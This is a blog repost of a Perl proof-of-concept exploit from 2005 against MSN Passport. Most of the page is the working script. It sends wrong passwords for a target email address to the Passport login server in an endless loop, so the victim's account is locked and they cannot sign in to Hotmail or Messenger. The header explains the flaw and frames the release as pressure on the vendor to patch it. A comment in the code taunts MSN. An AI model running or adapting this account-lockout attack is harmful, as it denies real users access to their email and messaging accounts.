MSN Passport accounts remote DoS code

    [多云 May 5, 2007 12:00 | by ]
#!/usr/bin/perl
#
# by: Simo aka _6mO_HaCk
# 1 december 2005
# MorX security research team
# www.morx.org
#
# Details:
#
# it seems that msn passport users using services such hotmail email and msn messenger and more
# are vulnerable to a remote denial of service, that allow any remote attacker to block access
# to their accounts, this problem is produced by the passport login server (login.passport.com)
# which locks users accounts when receiving wrong passwords instead of blocking the IP address
# where from the wrong passwords are being sent, so if an attacker knows a target email, the
# vulnerability can be exploited by sending continuous wrong passwords to login.passport.com:80
# after a certain number of wrong attemps the account will be blocked disallowing the victim to
# login to all msn passport network, including email and Instant Messaging services until the
# attacker stops the attack
#
# Note: The attack must start before the victim log in. Once the attack starts the victim
# will be unable to sign in.
#
# i would like to apologize in advance if this is a known issue, however this vulnerability is still
# exploitable and it's a very serious problem. hopefully the fact that i m publishing this info and
# this proof of concept exploit will push Mcft to patch their server soon
#
# Vulnerable:
# login.passport.com (used for all accounts authentification except the ones at msn.com)
# : blocks the account instead of the IP address
#
# Not vulnerable:
# msnialogin.passport.com (used only for accounts at msn.com authentification)
# : blocks the IP address instead of the account, giving the remote attacker no choice except
# in case if the attacker can pass the attack thru the victim IP address or if the attacker is
# connected from the same LAN sharing the same IP address with the target
#
# Thanks to massine and handrix for helping me test this
#
# PoC: www.morx.org/~censored~.txt

use IO::Socket;

if(!defined($ARGV[0])) {

system (clear);
print "\n";
print "=================================================\n";
print "--- MSN Passport accounts remote DoS by _6mO_HaCk\n";
print "--- MorX Security Research Team www.MorX.org\n";
print "=================================================\n";
print "--- Usage: perl $0 \n\n";
exit; }

$TARGET        = $ARGV[0];
$PORT          = "80";
$SERVER        = "login.passport.com";
$PASSWORD      = "~censored~"; # MSNs nobody like them, fux0r them ... ;>
$KEYS          = "lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7";
$NUMBER        = "99999999999999999999999999999999999999999999999999999";

#################################

$COMMAND1      = "GET /login2.srf HTTP/1.0";
$COMMAND2      = "Accept: */*";
$COMMAND3      = "Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=$TARGET,pwd=$PASSWORD,$KEYS";



print "=================================================\n";
print "--- MSN Passport accounts remote DoS by _6mO_HaCk\n";
print "--- MorX Security Research Team www.MorX.org\n";
print "=================================================\n";
print "[+] Attacking $TARGET ...\n";
print "[-] CTRL + C To Stop\n";
for($count=0;$count<=$NUMBER;$count++)
{
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$SERVER",PeerPort=>"$PORT")
|| die "Can't connect to $SERVER";
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";
$remote->autoflush();
}
print "Done, try again if needed :D";
Tags: ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(11366)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive